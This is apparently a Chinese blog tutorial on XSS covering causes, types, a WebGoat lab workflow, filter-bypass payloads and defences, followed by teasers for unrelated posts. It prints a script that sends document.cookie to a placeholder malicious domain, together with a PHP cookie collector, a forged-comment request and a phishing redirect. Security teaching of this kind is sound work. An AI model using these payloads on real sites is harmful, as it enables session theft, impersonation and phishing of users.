news 2026/5/13 5:41:11

漏洞挖掘从入门到进阶(第三期):Web 实战 ——XSS 跨站脚本原理与绕过技巧

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
漏洞挖掘从入门到进阶(第三期):Web 实战 ——XSS 跨站脚本原理与绕过技巧

第3期:Web漏洞挖掘实战|XSS跨站脚本漏洞原理与绕过技巧

第一期的内容戳这里

第二期的内容戳这里

前言

XSS(Cross-Site Scripting,跨站脚本漏洞)是Web漏洞中最常见的漏洞之一,其危害虽不及SQL注入直接,但可用于窃取用户Cookie、伪造用户身份、发起钓鱼攻击等,在实战安全测试与CTF竞赛中频繁出现。与SQL注入的“数据库交互漏洞”不同,XSS是“页面渲染漏洞”,核心成因是“用户输入未被过滤,直接嵌入页面HTML中,导致恶意脚本被执行”。

本文将从底层渲染原理出发,拆解XSS的成因、分类、挖掘流程,结合OWASP WebGoat靶场实战,覆盖反射型、存储型XSS的挖掘与绕过技巧,同时补充前端/后端防护方案,兼顾理论与实操,适合Web安全新手、前端开发者、CTF爱好者阅读,需具备基础的HTML、JavaScript与HTTP协议知识。

一、XSS底层原理与核心成因

XSS的本质是“用户输入可控+页面未做过滤,导致恶意JavaScript脚本被浏览器执行”,其底层依赖浏览器的HTML渲染机制——浏览器会将页面中的HTML代码解析渲染,若用户输入的恶意脚本被当作合法HTML/JS代码解析,就会触发XSS。

  1. 漏洞代码示例(HTML+PHP)

    <!DOCTYPE html> <html> <body> <h1>搜索结果</h1> <?php // 接收用户输入的搜索关键词 $keyword = $_GET['keyword']; // 直接将用户输入嵌入页面(未做过滤) echo "你搜索的关键词是:" . $keyword; ?> </body> </html>
  2. XSS触发过程

当用户输入正常关键词(keyword=web安全)时,页面渲染后显示:“你搜索的关键词是:web安全”,无异常;当用户输入恶意脚本(keyword=< script>alert(‘XSS’)</ script>)时,页面渲染后的HTML代码为:

<!DOCTYPE html> <html> <body> <h1>搜索结果</h1> 你搜索的关键词是:<script>alert('XSS')</script> </body> </html>

浏览器解析到< script>标签后,会执行其中的alert(‘XSS’)语句,弹出弹窗,触发XSS漏洞。

  1. 核心成因总结

XSS的触发需满足两个核心条件,二者缺一不可:

补充说明:XSS的危害取决于恶意脚本的功能,简单的脚本仅能弹出弹窗,复杂的脚本可窃取用户Cookie(document.cookie)、伪造用户请求、跳转钓鱼页面等。

二、XSS的核心分类(按存储与触发方式)

根据恶意脚本的存储方式与触发场景,XSS可分为3类,不同类型的挖掘思路、危害范围差异较大,新手需重点掌握前两类。

  1. 反射型XSS(非持久化XSS)
  1. 存储型XSS(持久化XSS)
  1. DOM型XSS(文档对象模型XSS)

三、XSS标准化挖掘流程(靶场实战同步)

本文以OWASP WebGoat反射型XSS题目为例,拆解“信息收集→漏洞探测→漏洞验证→漏洞利用”的完整流程,新手可跟着实操;同时补充存储型XSS的挖掘要点。

  1. 信息收集(前置步骤)
  1. 漏洞探测(核心步骤)

漏洞探测的核心是“确认是否存在XSS注入点”,常用两种方式:手动探测与工具探测,优先手动探测(避免工具误报)。

(1)手动探测(反射型XSS)

(2)存储型XSS探测要点

存储型XSS的探测流程与反射型类似,核心差异是“需确认脚本是否被存储”:

(3)工具探测(Burp Suite+XSS插件)

对于批量探测或复杂场景,可使用Burp Suite辅助探测,搭配XSS插件(如XSS Validator):

  1. 漏洞利用(实战场景)

XSS的利用核心是“构造恶意脚本,实现具体攻击目标”,实战中常见的利用场景有3种:

(1)窃取用户Cookie

Cookie中通常包含用户登录凭证,窃取Cookie后可伪造用户身份登录,恶意脚本示例:

<script> // 将Cookie发送到恶意服务器 var img = new Image(); img.src = "http://恶意域名/steal.php?cookie=" + document.cookie; </script>

恶意服务器steal.php代码(接收并存储Cookie):

<?php $cookie = $_GET['cookie']; // 将Cookie写入文件 file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND); ?>

(2)伪造用户请求

通过XSS脚本伪造用户的POST/GET请求,执行恶意操作(如修改密码、发布恶意内容),示例(伪造评论提交请求):

<script> // 构造POST请求,伪造用户发布恶意评论 var xhr = new XMLHttpRequest(); xhr.open("POST", "http://目标域名/submit_comment.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("comment=恶意内容&user=当前用户"); </script>

(3)跳转钓鱼页面

通过XSS脚本将页面跳转到钓鱼页面,诱导用户输入账号密码,示例:

<script> // 延迟跳转,避免被用户察觉 setTimeout(function(){ document.location.href = "http://钓鱼域名/login.html"; }, 3000); </script>
  1. 漏洞验证与风险评估

四、常见过滤绕过技巧(实战必备)

实战中,开发者常会通过前端过滤、后端过滤两种方式防御XSS,新手需掌握以下5种常用绕过技巧,应对不同过滤场景。

  1. 标签与事件绕过(针对标签过滤)

若开发者过滤了< script>标签,可使用其他支持JS执行的HTML标签+事件属性绕过,常用组合如下:

# 图片标签+事件(最常用) <img src=x onerror=alert(1)> # onerror:图片加载失败时执行 <img src=1 onload=alert(1)> # onload:图片加载成功时执行 # 链接标签+事件 <a href=javascript:alert(1)>点击触发</a> # 点击链接执行 <a href=x onclick=alert(1)>点击触发</a> # 其他标签 <body onload=alert(1)> # 页面加载完成时执行 <svg onload=alert(1)> # SVG标签支持JS执行
  1. 大小写混淆绕过(针对大小写过滤)

若开发者仅过滤小写标签/事件,可通过大小写混淆绕过(浏览器解析HTML时不区分大小写):

<ScRiPt>alert(1)</ScRiPt> <img src=x OnErRoR=alert(1)>
  1. 编码绕过(针对特殊字符过滤)

若开发者过滤了<、>、"、'等特殊字符,可使用HTML实体编码、URL编码绕过,需根据渲染场景选择编码方式:

  1. 注释插入绕过(针对关键字过滤)

若开发者过滤了完整的关键字(如script、onerror),可在关键字中插入HTML注释,绕过过滤:

<sc<!--注释-->ript>alert(1)</sc<!--注释-->ript> <img src=x on<!--注释-->error=alert(1)>

原理:服务器过滤时会匹配完整关键字,插入注释后关键字被拆分,不会被过滤;浏览器解析时会忽略注释,拼接关键字并执行。

  1. DOM型XSS绕过技巧(针对后端过滤)

DOM型XSS漏洞在前端,后端过滤无效,可通过以下方式绕过前端过滤:

五、XSS防护方案(攻防兼备)

XSS防护需兼顾前端与后端,核心思路是“过滤输入、净化输出”,结合以下3种方案,可有效防御绝大多数XSS漏洞。

  1. 后端过滤与转义(核心防护)

后端过滤是最有效的防护方式,需对所有用户输入进行严格过滤或转义,推荐使用编程语言自带的转义函数:

  1. 前端过滤(辅助防护)

前端过滤可拦截简单的恶意脚本,提升用户体验,但不能作为核心防护(前端代码可被篡改):

  1. 其他防护措施

六、新手避坑指南(核心5点)

七、总结与下期预告

本文拆解了XSS跨站脚本漏洞的底层原理、核心分类、标准化挖掘流程与实战绕过技巧,结合OWASP WebGoat靶场完成实操,核心要点是“理解页面渲染机制,掌握输入过滤与输出净化的攻防逻辑”。XSS的挖掘核心不是背诵payload,而是根据过滤规则灵活构造脚本,同时兼顾防护方案,形成攻防兼备的能力。

网安学习资源

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,100多本网安电子书,最新学习路线图和工具安装包都有,不用担心学不全。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/9 19:05:44

基于 ESP32 的雨伞遗忘提醒挂钩设计与实现

引言 下雨天出门忘带伞、到家忘收伞是生活中常见的小烦恼,尤其是匆忙出门时,雨伞遗落在挂钩上往往会导致出行不便。本文基于 ESP32 微控制器设计一款低成本、易实现的 “雨伞遗忘” 提醒挂钩,通过压力检测判断雨伞是否悬挂、人体红外检测判断人员是否离开,当检测到 “有伞…

作者头像 李华
网站建设 2026/5/13 5:41:10

传输标准:企业应如何统一资源分级、负载配置与广域连通指标

制定传输资源分级标准、实施路由系统负载配置、达成广域网路由连通指标 摘要 本文为企业IT部门、信息化负责人及运维团队提供核心价值&#xff1a;通过可视化运行监控系统&#xff0c;支撑系统规划、标准化交付与平台化运维&#xff0c;实现高确定性的ICT基础设施管理&#x…

作者头像 李华
网站建设 2026/4/27 5:30:48

AI写论文超神组合!4款AI论文写作工具,为你的毕业论文保驾护航!

AI论文写作工具推荐 还在为撰写期刊论文而烦恼吗&#xff1f;面对海量的文献、复杂的格式以及无休止的修改&#xff0c;使得学术工作者们的效率普遍不高&#xff01;别担心&#xff0c;接下来我将推荐四款实测过的AI论文写作工具&#xff0c;它们能从论文文献检索、论文大纲生…

作者头像 李华
网站建设 2026/5/12 5:33:01

类的访问权限:public、private 与 protected 详解

类的访问权限&#xff1a;public、private 与 protected 详解 在C面向对象编程中&#xff0c;类的三大访问权限&#xff08;public、private、protected&#xff09;是实现封装特性的核心&#xff0c;也是连接类的定义与对象使用的关键纽带。上一篇博客《C 类与对象&#xff1…

作者头像 李华
网站建设 2026/5/11 13:42:12

【大咖专家领衔报告 | 南京航空航天大学航空学院主办 | EI检索会议征稿 | JPCS(ISSN:1742-6596) 出版】2026年航空航天工程与机械工程国际学术会议(AEME 2026)

2026年航空航天工程与机械工程国际学术会议&#xff08;AEME 2026) 2026 International Conference on Aerospace Engineering and Mechanical Engineering 2026年3月6-8日&#xff0c;中国北京&#xff08;会议线下举行&#xff09; 大会官网&#xff1a;www.icaeme.org【参…

作者头像 李华
网站建设 2026/5/3 12:30:22

简单理解:2.4G WIFI 辅助 LBS 定位 核心原理与实现解析

2.4G WIFI 辅助 LBS&#xff08;基于位置的服务&#xff09;定位&#xff0c;是利用 2.4G WIFI 的 AP 热点指纹 基站定位补盲的混合定位方案&#xff0c;核心解决纯卫星定位&#xff08;GPS / 北斗&#xff09;在室内 / 地下 / 高楼遮挡场景的失效问题&#xff0c;同时弥补纯基…

作者头像 李华